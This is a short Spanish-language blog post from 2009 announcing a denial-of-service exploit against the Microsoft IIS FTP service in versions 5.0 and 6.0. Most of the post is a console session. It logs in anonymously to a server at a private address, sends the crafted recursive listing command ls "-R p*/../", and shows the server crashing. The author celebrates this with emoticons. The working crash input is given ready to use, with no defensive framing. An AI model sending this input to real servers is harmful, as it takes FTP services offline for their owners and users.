Buscar dentro de este blog

viernes, 4 de septiembre de 2009

MS IIS FTPD DoS 0DAY :D

Nikolaos Rangos acaba de publicar un exploit para explotar una
vulnerabilidad de DoS del servicio IIS FTPD.

Este exploit simple puede ser explotado por cualquier usuario
(incluso los "anonymous") que se conecten a un FTP vulnerable,
siempre y cuando tengan acceso de lectura en un directorio...

A continuación voy a mostrar una manera de provocar un DoS
accediendo con un usuario anonimo que tiene permiso de lectura
en el directorio "pub":

ftp 192.168.2.102 -> ftp server vulnerable
Verbindung mit 192.168.2.102 wurde hergestellt.
220 Microsoft FTP Service
Benutzer (192.168.2.102:(none)): anonymous -> usuario anonimo
331 Anonymous access allowed, send identity (e-mail name) as password.
Kennwort:
230 Anonymous user logged in.
ftp> ls "-R p*/../"
...
p*/../pub:
pub
...
p*/../pub:
pub
...
p*/../pub:
pub
...
p*/../pub:
pub
...
Remore Host has closed the connection. -> DoS exitoso :)

Este DoS se produce tras provocar un tipico "stack overflow"
(esto se puede corroborar debuggeando el servicio con el OllyDbg).

Lo mejor de todo es que este exploit afecta a las
versiones IIS 5.0 y 6.0
:D

No hay comentarios:

Publicar un comentario